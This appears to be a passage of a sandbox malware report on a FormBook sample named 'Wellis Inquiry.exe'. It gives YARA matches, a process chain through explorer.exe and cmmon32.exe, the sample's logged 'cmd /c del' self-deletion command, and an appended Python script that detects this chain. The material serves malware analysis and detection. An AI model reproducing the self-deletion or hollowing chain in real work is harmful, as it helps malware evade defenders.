6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 
3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          System Behavior

                                                          General

                                                          Start time: 07:28:22
                                                          Start date: 14/10/2021
                                                          Path: C:\Users\user\Desktop\Wellis Inquiry.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: 'C:\Users\user\Desktop\Wellis Inquiry.exe'
                                                          Imagebase: 0xff0000
                                                          File size: 337408 bytes
                                                          MD5 hash: C357A8010E661A49DF2E813BD22590B6
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: .Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.671146888.0000000004349000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Start time:07:28:30
                                                          Start date:14/10/2021
                                                          Path:C:\Users\user\Desktop\Wellis Inquiry.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\Wellis Inquiry.exe
                                                          Imagebase:0x6a0000
                                                          File size:337408 bytes
                                                          MD5 hash:C357A8010E661A49DF2E813BD22590B6
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.745846154.0000000001090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.745321491.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.745670982.0000000000C10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Start time:07:28:31
                                                          Start date:14/10/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff6fee60000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.715332371.000000000E4B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.699912453.000000000E4B9000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high

                                                          General

                                                          Start time:07:29:03
                                                          Start date:14/10/2021
                                                          Path:C:\Windows\SysWOW64\cmmon32.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                          Imagebase:0x2c0000
                                                          File size:36864 bytes
                                                          MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.922603929.0000000002D20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.921975794.0000000000360000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.922486626.0000000002C20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          General

                                                          Start time:07:29:07
                                                          Start date:14/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:07:29:07
                                                          Start date:14/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
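The process list above shows the chain a defender wants to catch on a real host rather than in a sandbox: the .NET loader re-launches its own image (the child reports "Programmed in: C, C++" while the parent is .NET, consistent with the hollowed child running the unpacked payload), a 32-bit utility from SysWOW64 (cmmon32.exe) appears under explorer.exe with nothing but its own path as command line, and cmd.exe then deletes the original sample. The Python below is an added example, not part of this report or of any Joe Sandbox tooling. It runs those three checks over process-creation records constructed from the values on this page; the PIDs, the parent/child relationships and the Sysmon-style field names are assumptions, since the report does not print a process tree.

```python
"""Three process-lineage checks for the FormBook-style chain seen above.

Records mimic Sysmon Event ID 1 fields (assumed naming); the sample events
are constructed from the General blocks on this page, PIDs and parentage
are assumed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str          # full path of the created process
    command_line: str   # as logged; may or may not repeat the image path
    parent_image: str   # full path of the creating process


# "/c del <path>" with optional single or double quotes around the path.
DEL_RE = re.compile(r"""/c\s+del\s+["']?(?P<path>[^"']+?)["']?\s*$""", re.IGNORECASE)


def norm(path: str) -> str:
    """Case-fold and strip the quoting that reports and loggers add."""
    return path.strip().strip("'\"").lower()


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def self_respawn(ev: ProcEvent) -> bool:
    """Parent and child share one image: the usual prelude to hollowing the child."""
    return norm(ev.parent_image) == norm(ev.image)


def bare_syswow64_from_explorer(ev: ProcEvent) -> bool:
    """explorer.exe starting a SysWOW64 binary whose command line is only its
    own path. Users seldom launch 32-bit system utilities this way; injected
    explorer.exe does. Noisy on hosts with 32-bit shell extensions, so tune."""
    return (basename(ev.parent_image) == "explorer.exe"
            and "\\syswow64\\" in ev.image.lower()
            and norm(ev.command_line) == norm(ev.image))


def self_delete_target(ev: ProcEvent, earlier: Iterable[ProcEvent]) -> Optional[str]:
    """cmd.exe deleting a path that an earlier process in the log ran as its
    image. Returns that image path, or None."""
    if basename(ev.image) != "cmd.exe":
        return None
    m = DEL_RE.search(ev.command_line)
    if not m:
        return None
    target = norm(m.group("path"))
    for prior in earlier:
        if norm(prior.image) == target:
            return prior.image
    return None


def analyse(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, finding) pairs in log order."""
    findings: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        if self_respawn(ev):
            findings.append((ev.pid, "re-launch of own image (hollowing prelude)"))
        if bare_syswow64_from_explorer(ev):
            findings.append((ev.pid, f"bare SysWOW64 utility under explorer.exe: {basename(ev.image)}"))
        victim = self_delete_target(ev, events[:i])
        if victim:
            findings.append((ev.pid, f"self-deletion of {victim}"))
    return findings


# Constructed from this page; PIDs and parent links are assumptions.
SAMPLE = r"C:\Users\user\Desktop\Wellis Inquiry.exe"
EVENTS = [
    ProcEvent(1001, 900, SAMPLE, f"'{SAMPLE}'", r"C:\Windows\explorer.exe"),
    ProcEvent(1002, 1001, SAMPLE, SAMPLE, SAMPLE),
    ProcEvent(1003, 900, r"C:\Windows\SysWOW64\cmmon32.exe",
              r"C:\Windows\SysWOW64\cmmon32.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(1004, 1003, r"C:\Windows\SysWOW64\cmd.exe",
              f"/c del '{SAMPLE}'", r"C:\Windows\SysWOW64\cmmon32.exe"),
    ProcEvent(1005, 1004, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
              r"C:\Windows\SysWOW64\cmd.exe"),
]

if __name__ == "__main__":
    for pid, msg in analyse(EVENTS):
        print(pid, msg)
```

The self-deletion rule is the most robust of the three because it ties the cmd.exe argument back to an image path already seen in the same log, which ordinary cleanup scripts rarely do; the bare-SysWOW64 rule should be scoped to a short list of utilities (cmmon32.exe among them) before it goes into production.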
